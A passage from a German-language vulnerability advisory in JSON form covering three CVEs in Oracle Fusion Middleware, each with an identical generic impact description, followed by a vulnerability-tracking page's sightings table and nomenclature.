"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3625"
},
{
"cve": "CVE-2017-3626",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-3626"
},
{
"cve": "CVE-2017-5638",
"notes": [
{
"category": "description",
"text": "In Oracle Fusion Middleware existieren mehrere nicht n\u00e4her beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit gef\u00e4hrden. F\u00fcr die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle ver\u00f6ffentlicht keine weiteren Details zu diesen Schwachstellen (au\u00dfer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadensh\u00f6he ausschlie\u00dflich auf Basis der CVSS Impact Matrix. Der Maximalwert f\u00fcr diese Produkte ist \"High\" f\u00fcr \"Integrity\", \"Confidentiality\" und \"Availability\" und bewirkt damit eine \"hohe\" Schadensh\u00f6he."
}
],
"product_status": {
"known_affected": [
"T009734",
"T006198"
]
},
"release_date": "2017-04-18T22:00:00.000+00:00",
"title": "CVE-2017-5638"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…